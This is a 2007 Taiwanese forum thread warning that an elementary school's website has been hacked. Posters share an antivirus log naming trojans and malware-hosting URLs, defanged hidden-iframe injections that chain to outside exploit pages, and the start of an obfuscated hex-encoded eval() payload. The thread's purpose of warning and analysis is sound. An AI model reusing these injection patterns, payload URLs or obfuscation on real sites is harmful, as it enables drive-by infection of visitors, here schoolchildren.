PCDVD數位科技討論區

PCDVD數位科技討論區 (https://www.pcdvd.com.tw/index.php)
-   七嘴八舌異言堂 (https://www.pcdvd.com.tw/forumdisplay.php?f=12)
-   -   屏東縣瑞光國小.. 病毒警告 (https://www.pcdvd.com.tw/showthread.php?t=764529)

德州炸雞 2007-12-23 01:19 PM

屏東縣瑞光國小.. 病毒警告
 
該學校網站好像中標了

剛剛小朋友點入.卡巴一直跳一直卡

真懷疑進入學校網站的小學生電腦會怎樣 :stupefy:


www.rgps.ptc.edu.tw不要點


已偵測到:木馬程式 Trojan-Downloader.JS.Agent.wk 指令碼:http://www.rgps.ptc.edu.tw/[5]
已偵測到:惡意軟體 Exploit.Win32.RealPlr.o 網址:http://www.loveyoushipin.com/pic/web.htm
已偵測到:病毒 Worm.Win32.Downloader.cs 網址:http://www.loveyoushipin.com/pic.exe//PE_Patch//UPack
已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\WINDOWS\rising306.exe//PE_Patch//UPack
已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\8LINODQB\pic[1].exe//PE_Patch//UPack
已偵測到:木馬程式 Trojan-Downloader.Win32.Agent.ggs 網址:http://sss.969222.com/bak.css//PE_Patch.UPX//UPX
已偵測到:木馬程式 Trojan-Downloader.VBS.Psyme.lh 網址:http://count23.51yes.ws/ying/Ms06014.htm
已偵測到:病毒 Worm.Win32.Downloader.cx 網址:http://web.wzxyq.com/mm/mm.exe//PE_Patch//UPack
已刪除:新的威脅 (修改) 檔案:

已刪除:病毒 Worm.Win32.Downloader.cx 檔案:c:\windows\microsoft.pif
BAD_STATUS(5)病毒 Worm.Win32.Downloader.cx 檔案:c:\windows\microsoft.pif//PE_Patch
已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\WINDOWS\rising197.exe
已刪除:病毒 Worm.Win32.Downloader.de 網址:http://down.llsging.com/bb/014.exe//PE_Patch//UPack
已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\49YB0LAV\pic[1].exe//PE_Patch//UPack
已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\System Volume Information\_restore{6FCBD95C-429F-446E-9A8D-0D72669CD99D}\RP13\A0009896.exe//PE_Patch//UPack
已刪除:病毒 Worm.Win32.Downloader.cx 檔案:C:\System Volume Information\_restore{6FCBD95C-429F-446E-9A8D-0D72669CD99D}\RP13\A0010852.pif//PE_Patch//UPack
已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\System Volume Information\_restore{6FCBD95C-429F-446E-9A8D-0D72669CD99D}\RP13\A0010856.exe//PE_Patch//UPack
未發現:病毒 Worm.Win32.Downloader.cx 檔案:C:\System Volume Information\_restore{6FCBD95C-429F-446E-9A8D-0D72669CD99D}\RP13\A0010874.pif//PE_Patch//UPack
未發現:病毒 Worm.Win32.Downloader.cs 檔案:C:\System Volume Information\_restore{6FCBD95C-429F-446E-9A8D-0D72669CD99D}\RP13\A0010875.exe//PE_Patch//UPack

李麥客 2007-12-23 01:24 PM

這種公家單位....而且又是稍微遠一點的學校
要是沒有什麼錢請外面代管網站
校務人員剛好又對電腦不太熟
自己架站的確很容易出包

missone 2007-12-23 01:30 PM

點進去一點反應也沒有啊?
KIS 7.0

darksnow 2007-12-23 01:54 PM

首頁被塞了這個



<ifrane src="hccp://w.aeaer.com/ae.htm" width=0 height=0></ifrane>


PS: 為了怕有人誤點, iframe改成ifrane http改成hccp

darksnow 2007-12-23 01:56 PM

ae.htm裡面又有這些

<ifrane src="hccp://w.aeaer.com/in.htm" width=0 height=0></ifrane>
<ifrane src="hccp://uu.uuzzvv.com/uu.htm" width=0 height=0></ifrane>
<ifrane src="hccp://fu.55189.net/" width=0 height=0></ifrane>
<ifrane src="hccp://an.sbb22.com/id.htm" width=0 height=0></ifrane>
<ifrane src="hccp://wz.070808.net/37.htm" width=0 height=0></ifrane>

然後這些xx.htm裡面又有其他的iframe連到其他網站,
喵的一層套一層,還真妙!

missone 2007-12-23 01:57 PM

彈跳網頁嗎....?

darksnow 2007-12-23 02:02 PM

其中一個最後一層裡面是這個東西,
還有一個.js好像是解編碼用的

代碼:
<SCRIPT LANGUAGE='JavaScript'> 
function ResumeError() { 
return true; 
} 
window.onerror = ResumeError; 
</SCRIPT>
<SCRIPT LANGUAGE="JavaScript">
eval("\x2f\x2a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47
\x45\x3d\x27\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\x27\x3e\x20\x0d\x0a\x66
\x75\x6e\x63\x74\x69\x6f\x6e\x20\x52\x65\x73\x75\x6d\x65\x45\x72\x72\x6f\x72
\x28\x29\x20\x7b\x20\x0d\x0a\x72\x65\x74\x75\x72\x6e\x20\x74\x72\x75\x65\x3b
\x20\x0d\x0a\x7d\x20\x0d\x0a\x77\x69\x6e\x64\x6f\x77\x2e\x6f\x6e\x65\x72\x72
\x6f\x72\x20\x3d\x20\x52\x65\x73\x75\x6d\x65\x45\x72\x72\x6f\x72\x3b\x20\x0d
.................太多略

John-Wel 2007-12-23 03:26 PM

:jolin: 真的有毒 :jolin:

willism 2007-12-23 03:41 PM

那就麻煩樓主告知學校這件事吧 :rolleyes:

hufun 2007-12-23 03:46 PM

請樓主告知該校的資訊組長或教務處吧


所有的時間均為GMT +8。 現在的時間是06:38 AM.

vBulletin Version 3.0.1
powered_by_vbulletin 2025。